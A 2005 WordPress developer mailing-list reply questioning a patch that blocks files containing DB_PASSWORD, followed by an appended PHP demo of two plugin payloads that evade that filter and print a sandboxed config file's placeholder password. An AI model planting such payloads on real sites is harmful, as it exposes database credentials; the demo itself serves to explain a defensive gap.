[wp-hackers] Security Vulnerability found - Forum Post

Kimmo Suominen kim at tac.nyc.ny.us
Thu Apr 14 06:13:12 GMT 2005

On Thu, Apr 14, 2005 at 12:27:12AM -0400, Owen Winkler wrote:
> Nonetheless, the enclosed patch prevents any user from reading or 
> writing a file that contains the DB_PASSWORD constant, including the 
> wp-admin/templates.php file.  With this not only can't you read files 
> that contain your WordPress database password via the web interface, you 
> can't alter existing files to output the password.  Of course, this will 
> prevent you from editing wp-config.php, setup-config.php, 
> wp-config-sample.php, and wp-db.php, but if you have cause to mess with 
> those files in the first place, you probably know how to use FTP or SSH 
> which would probably be better suited.

Since one could still save a file (e.g. a plugin or theme component)
that outputs the contents of wp-config.php on a web page, is checking
for DB_PASSWORD really that useful?

+ Kim
Kimmo Suominen <http://kimmo.suominen.com/>
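To make Kim's objection concrete, here is an added example (not Owen's patch and not WordPress code) of a content filter in the spirit of the one described, refusing to save any file whose text contains the token DB_PASSWORD, alongside two saved plugin files that pass that filter and still disclose the password. The filter function, the sandbox directory, the fake wp-config.php and its placeholder password are all constructed for the demonstration.

```php
<?php
// Added example: a DB_PASSWORD content filter and two files that slip past it.
// Nothing here is from the original patch or from WordPress.

// Hypothetical filter modelled on the described behaviour: reject any file
// whose contents mention the literal token DB_PASSWORD.
function filter_rejects(string $contents): bool {
    return strpos($contents, 'DB_PASSWORD') !== false;
}

// Constructed sandbox: a throwaway directory holding a fake wp-config.php
// with a placeholder password (not a real secret).
$root = sys_get_temp_dir() . '/wpdemo_' . uniqid();
mkdir($root, 0700);
file_put_contents($root . '/wp-config.php',
    "<?php\ndefine('DB_PASSWORD', 'not-a-real-secret');\n");

// Payload 1: never names the constant; it echoes the config file verbatim.
$payload_dump = "<?php readfile(__DIR__ . '/wp-config.php');\n";

// Payload 2: assembles the constant name at runtime, so the token the filter
// looks for never appears in the saved file.
$payload_const = "<?php require __DIR__ . '/wp-config.php';\n"
               . "echo constant('DB_' . 'PASS' . 'WORD');\n";

$results = [];
foreach (['dump' => $payload_dump, 'const' => $payload_const] as $name => $code) {
    $rejected = filter_rejects($code);    // what the filter would decide on save
    $path = "$root/plugin_$name.php";
    file_put_contents($path, $code);      // the "saved" plugin file
    ob_start();
    include $path;                        // what a web request to it would execute
    $output = ob_get_clean();
    $results[$name] = [
        'rejected_by_filter' => $rejected,
        'leaks_password'     => strpos($output, 'not-a-real-secret') !== false,
    ];
}

// Remove the sandbox again.
array_map('unlink', glob("$root/*.php"));
rmdir($root);

foreach ($results as $name => $r) {
    printf("%-6s rejected_by_filter=%s leaks_password=%s\n", $name,
        $r['rejected_by_filter'] ? 'yes' : 'no',
        $r['leaks_password'] ? 'yes' : 'no');
}
```

The direct form, a file that requires wp-config.php and echoes DB_PASSWORD by name, is the one case the token filter does catch; both variants above avoid the literal token while producing the same disclosure, which is the gap Kim points at. Run it from the PHP CLI in any writable environment; it touches only the temporary directory it creates.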
